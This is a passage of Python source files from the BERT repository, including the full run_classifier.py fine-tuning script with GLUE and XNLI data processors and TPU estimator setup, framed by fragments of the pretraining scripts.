name_to_features): """Decodes a record to a TensorFlow example.""" example = tf.parse_single_example(record, name_to_features) # tf.Example only supports tf.int64, but the TPU only supports tf.int32. # So cast all int64 to int32. for name in list(example.keys()): t = example[name] if t.dtype == tf.int64: t = tf.to_int32(t) example[name] = t return example def main(_): tf.logging.set_verbosity(tf.logging.INFO) if not FLAGS.do_train and not FLAGS.do_eval: raise ValueError("At least one of `do_train` or `do_eval` must be True.") bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file) tf.gfile.MakeDirs(FLAGS.output_dir) input_files = [] for input_pattern in FLAGS.input_file.split(","): input_files.extend(tf.gfile.Glob(input_pattern)) tf.logging.info("*** Input Files ***") for input_file in input_files: tf.logging.info(" %s" % input_file) tpu_cluster_resolver = None if FLAGS.use_tpu and FLAGS.tpu_name: tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( cluster=tpu_cluster_resolver, master=FLAGS.master, model_dir=FLAGS.output_dir, save_checkpoints_steps=FLAGS.save_checkpoints_steps, tpu_config=tf.contrib.tpu.TPUConfig( iterations_per_loop=FLAGS.iterations_per_loop, num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) model_fn = model_fn_builder( bert_config=bert_config, init_checkpoint=FLAGS.init_checkpoint, learning_rate=FLAGS.learning_rate, num_train_steps=FLAGS.num_train_steps, num_warmup_steps=FLAGS.num_warmup_steps, use_tpu=FLAGS.use_tpu, use_one_hot_embeddings=FLAGS.use_tpu) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, train_batch_size=FLAGS.train_batch_size, eval_batch_size=FLAGS.eval_batch_size) if FLAGS.do_train: tf.logging.info("***** Running training *****") tf.logging.info(" Batch size = %d", FLAGS.train_batch_size) train_input_fn = input_fn_builder( input_files=input_files, max_seq_length=FLAGS.max_seq_length, max_predictions_per_seq=FLAGS.max_predictions_per_seq, is_training=True) estimator.train(input_fn=train_input_fn, max_steps=FLAGS.num_train_steps) if FLAGS.do_eval: tf.logging.info("***** Running evaluation *****") tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size) eval_input_fn = input_fn_builder( input_files=input_files, max_seq_length=FLAGS.max_seq_length, max_predictions_per_seq=FLAGS.max_predictions_per_seq, is_training=False) result = estimator.evaluate( input_fn=eval_input_fn, steps=FLAGS.max_eval_steps) output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt") with tf.gfile.GFile(output_eval_file, "w") as writer: tf.logging.info("***** Eval results *****") for key in sorted(result.keys()): tf.logging.info(" %s = %s", key, str(result[key])) writer.write("%s = %s\n" % (key, str(result[key]))) if __name__ == "__main__": flags.mark_flag_as_required("input_file") flags.mark_flag_as_required("bert_config_file") flags.mark_flag_as_required("output_dir") tf.app.run() File: run_classifier.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """BERT finetuning runner.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import csv import os import modeling import optimization import tokenization import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS ## Required parameters flags.DEFINE_string( "data_dir", None, "The input data dir. Should contain the .tsv files (or other data files) " "for the task.") flags.DEFINE_string( "bert_config_file", None, "The config json file corresponding to the pre-trained BERT model. " "This specifies the model architecture.") flags.DEFINE_string("task_name", None, "The name of the task to train.") flags.DEFINE_string("vocab_file", None, "The vocabulary file that the BERT model was trained on.") flags.DEFINE_string( "output_dir", None, "The output directory where the model checkpoints will be written.") ## Other parameters flags.DEFINE_string( "init_checkpoint", None, "Initial checkpoint (usually from a pre-trained BERT model).") flags.DEFINE_bool( "do_lower_case", True, "Whether to lower case the input text. Should be True for uncased " "models and False for cased models.") flags.DEFINE_integer( "max_seq_length", 128, "The maximum total input sequence length after WordPiece tokenization. " "Sequences longer than this will be truncated, and sequences shorter " "than this will be padded.") flags.DEFINE_bool("do_train", False, "Whether to run training.") flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.") flags.DEFINE_bool( "do_predict", False, "Whether to run the model in inference mode on the test set.") flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.") flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.") flags.DEFINE_integer("predict_batch_size", 8, "Total batch size for predict.") flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.") flags.DEFINE_float("num_train_epochs", 3.0, "Total number of training epochs to perform.") flags.DEFINE_float( "warmup_proportion", 0.1, "Proportion of training to perform linear learning rate warmup for. " "E.g., 0.1 = 10% of training.") flags.DEFINE_integer("save_checkpoints_steps", 1000, "How often to save the model checkpoint.") flags.DEFINE_integer("iterations_per_loop", 1000, "How many steps to make in each estimator call.") flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.") tf.flags.DEFINE_string( "tpu_name", None, "The Cloud TPU to use for training. This should be either the name " "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 " "url.") tf.flags.DEFINE_string( "tpu_zone", None, "[Optional] GCE zone where the Cloud TPU is located in. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string( "gcp_project", None, "[Optional] Project name for the Cloud TPU-enabled project. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.") flags.DEFINE_integer( "num_tpu_cores", 8, "Only used if `use_tpu` is True. Total number of TPU cores to use.") class InputExample(object): """A single training/test example for simple sequence classification.""" def __init__(self, guid, text_a, text_b=None, label=None): """Constructs a InputExample. Args: guid: Unique id for the example. text_a: string. The untokenized text of the first sequence. For single sequence tasks, only this sequence must be specified. text_b: (Optional) string. The untokenized text of the second sequence. Only must be specified for sequence pair tasks. label: (Optional) string. The label of the example. This should be specified for train and dev examples, but not for test examples. """ self.guid = guid self.text_a = text_a self.text_b = text_b self.label = label class PaddingInputExample(object): """Fake example so the num input examples is a multiple of the batch size. When running eval/predict on the TPU, we need to pad the number of examples to be a multiple of the batch size, because the TPU requires a fixed batch size. The alternative is to drop the last batch, which is bad because it means the entire output data won't be generated. We use this class instead of `None` because treating `None` as padding battches could cause silent errors. """ class InputFeatures(object): """A single set of features of data.""" def __init__(self, input_ids, input_mask, segment_ids, label_id, is_real_example=True): self.input_ids = input_ids self.input_mask = input_mask self.segment_ids = segment_ids self.label_id = label_id self.is_real_example = is_real_example class DataProcessor(object): """Base class for data converters for sequence classification data sets.""" def get_train_examples(self, data_dir): """Gets a collection of `InputExample`s for the train set.""" raise NotImplementedError() def get_dev_examples(self, data_dir): """Gets a collection of `InputExample`s for the dev set.""" raise NotImplementedError() def get_test_examples(self, data_dir): """Gets a collection of `InputExample`s for prediction.""" raise NotImplementedError() def get_labels(self): """Gets the list of labels for this data set.""" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): """Reads a tab separated value file.""" with tf.gfile.Open(input_file, "r") as f: reader = csv.reader(f, delimiter="\t", quotechar=quotechar) lines = [] for line in reader: lines.append(line) return lines class XnliProcessor(DataProcessor): """Processor for the XNLI data set.""" def __init__(self): self.language = "zh" def get_train_examples(self, data_dir): """See base class.""" lines = self._read_tsv( os.path.join(data_dir, "multinli", "multinli.train.%s.tsv" % self.language)) examples = [] for (i, line) in enumerate(lines): if i == 0: continue guid = "train-%d" % (i) text_a = tokenization.convert_to_unicode(line[0]) text_b = tokenization.convert_to_unicode(line[1]) label = tokenization.convert_to_unicode(line[2]) if label == tokenization.convert_to_unicode("contradictory"): label = tokenization.convert_to_unicode("contradiction") examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)) return examples def get_dev_examples(self, data_dir): """See base class.""" lines = self._read_tsv(os.path.join(data_dir, "xnli.dev.tsv")) examples = [] for (i, line) in enumerate(lines): if i == 0: continue guid = "dev-%d" % (i) language = tokenization.convert_to_unicode(line[0]) if language != tokenization.convert_to_unicode(self.language): continue text_a = tokenization.convert_to_unicode(line[6]) text_b = tokenization.convert_to_unicode(line[7]) label = tokenization.convert_to_unicode(line[1]) examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)) return examples def get_labels(self): """See base class.""" return ["contradiction", "entailment", "neutral"] class MnliProcessor(DataProcessor): """Processor for the MultiNLI data set (GLUE version).""" def get_train_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "train.tsv")), "train") def get_dev_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "dev_matched.tsv")), "dev_matched") def get_test_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "test_matched.tsv")), "test") def get_labels(self): """See base class.""" return ["contradiction", "entailment", "neutral"] def _create_examples(self, lines, set_type): """Creates examples for the training and dev sets.""" examples = [] for (i, line) in enumerate(lines): if i == 0: continue guid = "%s-%s" % (set_type, tokenization.convert_to_unicode(line[0])) text_a = tokenization.convert_to_unicode(line[8]) text_b = tokenization.convert_to_unicode(line[9]) if set_type == "test": label = "contradiction" else: label = tokenization.convert_to_unicode(line[-1]) examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)) return examples class MrpcProcessor(DataProcessor): """Processor for the MRPC data set (GLUE version).""" def get_train_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "train.tsv")), "train") def get_dev_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev") def get_test_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "test.tsv")), "test") def get_labels(self): """See base class.""" return ["0", "1"] def _create_examples(self, lines, set_type): """Creates examples for the training and dev sets.""" examples = [] for (i, line) in enumerate(lines): if i == 0: continue guid = "%s-%s" % (set_type, i) text_a = tokenization.convert_to_unicode(line[3]) text_b = tokenization.convert_to_unicode(line[4]) if set_type == "test": label = "0" else: label = tokenization.convert_to_unicode(line[0]) examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)) return examples class ColaProcessor(DataProcessor): """Processor for the CoLA data set (GLUE version).""" def get_train_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "train.tsv")), "train") def get_dev_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev") def get_test_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "test.tsv")), "test") def get_labels(self): """See base class.""" return ["0", "1"] def _create_examples(self, lines, set_type): """Creates examples for the training and dev sets.""" examples = [] for (i, line) in enumerate(lines): # Only the test set has a header if set_type == "test" and i == 0: continue guid = "%s-%s" % (set_type, i) if set_type == "test": text_a = tokenization.convert_to_unicode(line[1]) label = "0" else: text_a = tokenization.convert_to_unicode(line[3]) label = tokenization.convert_to_unicode(line[1]) examples.append( InputExample(guid=guid, text_a=text_a, text_b=None, label=label)) return examples def convert_single_example(ex_index, example, label_list, max_seq_length, tokenizer): """Converts a single `InputExample` into a single `InputFeatures`.""" if isinstance(example, PaddingInputExample): return InputFeatures( input_ids=[0] * max_seq_length, input_mask=[0] * max_seq_length, segment_ids=[0] * max_seq_length, label_id=0, is_real_example=False) label_map = {} for (i, label) in enumerate(label_list): label_map[label] = i tokens_a = tokenizer.tokenize(example.text_a) tokens_b = None if example.text_b: tokens_b = tokenizer.tokenize(example.text_b) if tokens_b: # Modifies `tokens_a` and `tokens_b` in place so that the total # length is less than the specified length. # Account for [CLS], [SEP], [SEP] with "- 3" _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for [CLS] and [SEP] with "- 2" if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[0:(max_seq_length - 2)] # The convention in BERT is: # (a) For sequence pairs: # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP] # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1 # (b) For single sequences: # tokens: [CLS] the dog is hairy . [SEP] # type_ids: 0 0 0 0 0 0 0 # # Where "type_ids" are used to indicate whether this is the first # sequence or the second sequence. The embedding vectors for `type=0` and # `type=1` were learned during pre-training and are added to the wordpiece # embedding vector (and position vector). This is not *strictly* necessary # since the [SEP] token unambiguously separates the sequences, but it makes # it easier for the model to learn the concept of sequences. # # For classification tasks, the first vector (corresponding to [CLS]) is # used as the "sentence vector". Note that this only makes sense because # the entire model is fine-tuned. tokens = [] segment_ids = [] tokens.append("[CLS]") segment_ids.append(0) for token in tokens_a: tokens.append(token) segment_ids.append(0) tokens.append("[SEP]") segment_ids.append(0) if tokens_b: for token in tokens_b: tokens.append(token) segment_ids.append(1) tokens.append("[SEP]") segment_ids.append(1) input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) # Zero-pad up to the sequence length. while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length label_id = label_map[example.label] if ex_index < 5: tf.logging.info("*** Example ***") tf.logging.info("guid: %s" % (example.guid)) tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in tokens])) tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids])) tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask])) tf.logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids])) tf.logging.info("label: %s (id = %d)" % (example.label, label_id)) feature = InputFeatures( input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids, label_id=label_id, is_real_example=True) return feature def file_based_convert_examples_to_features( examples, label_list, max_seq_length, tokenizer, output_file): """Convert a set of `InputExample`s to a TFRecord file.""" writer = tf.python_io.TFRecordWriter(output_file) for (ex_index, example) in enumerate(examples): if ex_index % 10000 == 0: tf.logging.info("Writing example %d of %d" % (ex_index, len(examples))) feature = convert_single_example(ex_index, example, label_list, max_seq_length, tokenizer) def create_int_feature(values): f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values))) return f features = collections.OrderedDict() features["input_ids"] = create_int_feature(feature.input_ids) features["input_mask"] = create_int_feature(feature.input_mask) features["segment_ids"] = create_int_feature(feature.segment_ids) features["label_ids"] = create_int_feature([feature.label_id]) features["is_real_example"] = create_int_feature( [int(feature.is_real_example)]) tf_example = tf.train.Example(features=tf.train.Features(feature=features)) writer.write(tf_example.SerializeToString()) writer.close() def file_based_input_fn_builder(input_file, seq_length, is_training, drop_remainder): """Creates an `input_fn` closure to be passed to TPUEstimator.""" name_to_features = { "input_ids": tf.FixedLenFeature([seq_length], tf.int64), "input_mask": tf.FixedLenFeature([seq_length], tf.int64), "segment_ids": tf.FixedLenFeature([seq_length], tf.int64), "label_ids": tf.FixedLenFeature([], tf.int64), "is_real_example": tf.FixedLenFeature([], tf.int64), } def _decode_record(record, name_to_features): """Decodes a record to a TensorFlow example.""" example = tf.parse_single_example(record, name_to_features) # tf.Example only supports tf.int64, but the TPU only supports tf.int32. # So cast all int64 to int32. for name in list(example.keys()): t = example[name] if t.dtype == tf.int64: t = tf.to_int32(t) example[name] = t return example def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] # For training, we want a lot of parallel reading and shuffling. # For eval, we want no shuffling and parallel reading doesn't matter. d = tf.data.TFRecordDataset(input_file) if is_training: d = d.repeat() d = d.shuffle(buffer_size=100) d = d.apply( tf.contrib.data.map_and_batch( lambda record: _decode_record(record, name_to_features), batch_size=batch_size, drop_remainder=drop_remainder)) return d return input_fn def _truncate_seq_pair(tokens_a, tokens_b, max_length): """Truncates a sequence pair in place to the maximum length.""" # This is a simple heuristic which will always truncate the longer sequence # one token at a time. This makes more sense than truncating an equal percent # of tokens from each, since if one sequence is very short then each token # that's truncated likely contains more information than a longer sequence. while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() def create_model(bert_config, is_training, input_ids, input_mask, segment_ids, labels, num_labels, use_one_hot_embeddings): """Creates a classification model.""" model = modeling.BertModel( config=bert_config, is_training=is_training, input_ids=input_ids, input_mask=input_mask, token_type_ids=segment_ids, use_one_hot_embeddings=use_one_hot_embeddings) # In the demo, we are doing a simple classification task on the entire # segment. # # If you want to use the token-level output, use model.get_sequence_output() # instead. output_layer = model.get_pooled_output() hidden_size = output_layer.shape[-1].value output_weights = tf.get_variable( "output_weights", [num_labels, hidden_size], initializer=tf.truncated_normal_initializer(stddev=0.02)) output_bias = tf.get_variable( "output_bias", [num_labels], initializer=tf.zeros_initializer()) with tf.variable_scope("loss"): if is_training: # I.e., 0.1 dropout output_layer = tf.nn.dropout(output_layer, keep_prob=0.9) logits = tf.matmul(output_layer, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) probabilities = tf.nn.softmax(logits, axis=-1) log_probs = tf.nn.log_softmax(logits, axis=-1) one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32) per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1) loss = tf.reduce_mean(per_example_loss) return (loss, per_example_loss, logits, probabilities) def model_fn_builder(bert_config, num_labels, init_checkpoint, learning_rate, num_train_steps, num_warmup_steps, use_tpu, use_one_hot_embeddings): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" tf.logging.info("*** Features ***") for name in sorted(features.keys()): tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape)) input_ids = features["input_ids"] input_mask = features["input_mask"] segment_ids = features["segment_ids"] label_ids = features["label_ids"] is_real_example = None if "is_real_example" in features: is_real_example = tf.cast(features["is_real_example"], dtype=tf.float32) else: is_real_example = tf.ones(tf.shape(label_ids), dtype=tf.float32) is_training = (mode == tf.estimator.ModeKeys.TRAIN) (total_loss, per_example_loss, logits, probabilities) = create_model( bert_config, is_training, input_ids, input_mask, segment_ids, label_ids, num_labels, use_one_hot_embeddings) tvars = tf.trainable_variables() initialized_variable_names = {} scaffold_fn = None if init_checkpoint: (assignment_map, initialized_variable_names ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint) if use_tpu: def tpu_scaffold(): tf.train.init_from_checkpoint(init_checkpoint, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_checkpoint, assignment_map) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) output_spec = None if mode == tf.estimator.ModeKeys.TRAIN: train_op = optimization.create_optimizer( total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, train_op=train_op, scaffold_fn=scaffold_fn) elif mode == tf.estimator.ModeKeys.EVAL: def metric_fn(per_example_loss, label_ids, logits, is_real_example): predictions = tf.argmax(logits, axis=-1, output_type=tf.int32) accuracy = tf.metrics.accuracy( labels=label_ids, predictions=predictions, weights=is_real_example) loss = tf.metrics.mean(values=per_example_loss, weights=is_real_example) return { "eval_accuracy": accuracy, "eval_loss": loss, } eval_metrics = (metric_fn, [per_example_loss, label_ids, logits, is_real_example]) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, eval_metrics=eval_metrics, scaffold_fn=scaffold_fn) else: output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions={"probabilities": probabilities}, scaffold_fn=scaffold_fn) return output_spec return model_fn # This function is not used by this file but is still used by the Colab and # people who depend on it. def input_fn_builder(features, seq_length, is_training, drop_remainder): """Creates an `input_fn` closure to be passed to TPUEstimator.""" all_input_ids = [] all_input_mask = [] all_segment_ids = [] all_label_ids = [] for feature in features: all_input_ids.append(feature.input_ids) all_input_mask.append(feature.input_mask) all_segment_ids.append(feature.segment_ids) all_label_ids.append(feature.label_id) def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] num_examples = len(features) # This is for demo purposes and does NOT scale to large data sets. We do # not use Dataset.from_generator() because that uses tf.py_func which is # not TPU compatible. The right way to load data is with TFRecordReader. d = tf.data.Dataset.from_tensor_slices({ "input_ids": tf.constant( all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32), "input_mask": tf.constant( all_input_mask, shape=[num_examples, seq_length], dtype=tf.int32), "segment_ids": tf.constant( all_segment_ids, shape=[num_examples, seq_length], dtype=tf.int32), "label_ids": tf.constant(all_label_ids, shape=[num_examples], dtype=tf.int32), }) if is_training: d = d.repeat() d = d.shuffle(buffer_size=100) d = d.batch(batch_size=batch_size, drop_remainder=drop_remainder) return d return input_fn # This function is not used by this file but is still used by the Colab and # people who depend on it. def convert_examples_to_features(examples, label_list, max_seq_length, tokenizer): """Convert a set of `InputExample`s to a list of `InputFeatures`.""" features = [] for (ex_index, example) in enumerate(examples): if ex_index % 10000 == 0: tf.logging.info("Writing example %d of %d" % (ex_index, len(examples))) feature = convert_single_example(ex_index, example, label_list, max_seq_length, tokenizer) features.append(feature) return features def main(_): tf.logging.set_verbosity(tf.logging.INFO) processors = { "cola": ColaProcessor, "mnli": MnliProcessor, "mrpc": MrpcProcessor, "xnli": XnliProcessor, } tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case, FLAGS.init_checkpoint) if not FLAGS.do_train and not FLAGS.do_eval and not FLAGS.do_predict: raise ValueError( "At least one of `do_train`, `do_eval` or `do_predict' must be True.") bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file) if FLAGS.max_seq_length > bert_config.max_position_embeddings: raise ValueError( "Cannot use sequence length %d because the BERT model " "was only trained up to sequence length %d" % (FLAGS.max_seq_length, bert_config.max_position_embeddings)) tf.gfile.MakeDirs(FLAGS.output_dir) task_name = FLAGS.task_name.lower() if task_name not in processors: raise ValueError("Task not found: %s" % (task_name)) processor = processors[task_name]() label_list = processor.get_labels() tokenizer = tokenization.FullTokenizer( vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case) tpu_cluster_resolver = None if FLAGS.use_tpu and FLAGS.tpu_name: tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( cluster=tpu_cluster_resolver, master=FLAGS.master, model_dir=FLAGS.output_dir, save_checkpoints_steps=FLAGS.save_checkpoints_steps, tpu_config=tf.contrib.tpu.TPUConfig( iterations_per_loop=FLAGS.iterations_per_loop, num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) train_examples = None num_train_steps = None num_warmup_steps = None if FLAGS.do_train: train_examples = processor.get_train_examples(FLAGS.data_dir) num_train_steps = int( len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs) num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion) model_fn = model_fn_builder( bert_config=bert_config, num_labels=len(label_list), init_checkpoint=FLAGS.init_checkpoint, learning_rate=FLAGS.learning_rate, num_train_steps=num_train_steps, num_warmup_steps=num_warmup_steps, use_tpu=FLAGS.use_tpu, use_one_hot_embeddings=FLAGS.use_tpu) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, train_batch_size=FLAGS.train_batch_size, eval_batch_size=FLAGS.eval_batch_size, predict_batch_size=FLAGS.predict_batch_size) if FLAGS.do_train: train_file = os.path.join(FLAGS.output_dir, "train.tf_record") file_based_convert_examples_to_features( train_examples, label_list, FLAGS.max_seq_length, tokenizer, train_file) tf.logging.info("***** Running training *****") tf.logging.info(" Num examples = %d", len(train_examples)) tf.logging.info(" Batch size = %d", FLAGS.train_batch_size) tf.logging.info(" Num steps = %d", num_train_steps) train_input_fn = file_based_input_fn_builder( input_file=train_file, seq_length=FLAGS.max_seq_length, is_training=True, drop_remainder=True) estimator.train(input_fn=train_input_fn, max_steps=num_train_steps) if FLAGS.do_eval: eval_examples = processor.get_dev_examples(FLAGS.data_dir) num_actual_eval_examples = len(eval_examples) if FLAGS.use_tpu: # TPU requires a fixed batch size for all batches, therefore the number # of examples must be a multiple of the batch size, or else examples # will get dropped. So we pad with fake examples which are ignored # later on. These do NOT count towards the metric (all tf.metrics # support a per-instance weight, and these get a weight of 0.0). while len(eval_examples) % FLAGS.eval_batch_size != 0: eval_examples.append(PaddingInputExample()) eval_file = os.path.join(FLAGS.output_dir, "eval.tf_record") file_based_convert_examples_to_features( eval_examples, label_list, FLAGS.max_seq_length, tokenizer, eval_file) tf.logging.info("***** Running evaluation *****") tf.logging.info(" Num examples = %d (%d actual, %d padding)", len(eval_examples), num_actual_eval_examples, len(eval_examples) - num_actual_eval_examples) tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size) # This tells the estimator to run through the entire set. eval_steps = None # However, if running eval on the TPU, you will need to specify the # number of steps. if FLAGS.use_tpu: assert len(eval_examples) % FLAGS.eval_batch_size == 0 eval_steps = int(len(eval_examples) // FLAGS.eval_batch_size) eval_drop_remainder = True if FLAGS.use_tpu else False eval_input_fn = file_based_input_fn_builder( input_file=eval_file, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=eval_drop_remainder) result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps) output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt") with tf.gfile.GFile(output_eval_file, "w") as writer: tf.logging.info("***** Eval results *****") for key in sorted(result.keys()): tf.logging.info(" %s = %s", key, str(result[key])) writer.write("%s = %s\n" % (key, str(result[key]))) if FLAGS.do_predict: predict_examples = processor.get_test_examples(FLAGS.data_dir) num_actual_predict_examples = len(predict_examples) if FLAGS.use_tpu: # TPU requires a fixed batch size for all batches, therefore the number # of examples must be a multiple of the batch size, or else examples # will get dropped. So we pad with fake examples which are ignored # later on. while len(predict_examples) % FLAGS.predict_batch_size != 0: predict_examples.append(PaddingInputExample()) predict_file = os.path.join(FLAGS.output_dir, "predict.tf_record") file_based_convert_examples_to_features(predict_examples, label_list, FLAGS.max_seq_length, tokenizer, predict_file) tf.logging.info("***** Running prediction*****") tf.logging.info(" Num examples = %d (%d actual, %d padding)", len(predict_examples), num_actual_predict_examples, len(predict_examples) - num_actual_predict_examples) tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size) predict_drop_remainder = True if FLAGS.use_tpu else False predict_input_fn = file_based_input_fn_builder( input_file=predict_file, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=predict_drop_remainder) result = estimator.predict(input_fn=predict_input_fn) output_predict_file = os.path.join(FLAGS.output_dir, "test_results.tsv") with tf.gfile.GFile(output_predict_file, "w") as writer: num_written_lines = 0 tf.logging.info("***** Predict results *****") for (i, prediction) in enumerate(result): probabilities = prediction["probabilities"] if i >= num_actual_predict_examples: break output_line = "\t".join( str(class_probability) for class_probability in probabilities) + "\n" writer.write(output_line) num_written_lines += 1 assert num_written_lines == num_actual_predict_examples if __name__ == "__main__": flags.mark_flag_as_required("data_dir") flags.mark_flag_as_required("task_name") flags.mark_flag_as_required("vocab_file") flags.mark_flag_as_required("bert_config_file") flags.mark_flag_as_required("output_dir") tf.app.run() File: create_pretraining_data.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Create masked LM/next sentence masked_lm TF examples for BERT.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import random import tokenization import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS flags.DEFINE_string("input_file", None, "Input raw text file (or comma-separated list of files).") flags.DEFINE_string( "output_file", None, "Output TF example file (or comma-separated list of files).") flags.DEFINE_string("vocab_file", None, "The vocabulary file that the BERT model was trained on.") flags.DEFINE_bool( "do_lower_case", True, "Whether to lower case the input text. Should be True for uncased " "models and False for cased models.") flags.DEFINE_bool( "do_whole_word_mask", False, "Whether to use whole word masking rather than per-WordPiece masking.") flags.DEFINE_integer("max_seq_length", 128, "Maximum sequence length.") flags.DEFINE_integer("max_predictions_per_seq", 20, "Maximum number of masked LM predictions per sequence.") flags.DEFINE_integer("random_seed", 12345, "Random seed for data generation.") flags.DEFINE_integer( "dupe_factor", 10, "Number of times to duplicate the input data (with different masks).") flags.DEFINE_float("masked_lm_prob", 0.15, "Masked LM probability.") flags.DEFINE_float( "short_seq_prob", 0.1, "Probability of creating sequences which are shorter than the " "maximum length.") class TrainingInstance(object): """A single training instance (sentence pair).""" def __init__(self, tokens, segment_ids, masked_lm_positions, masked_lm_labels, 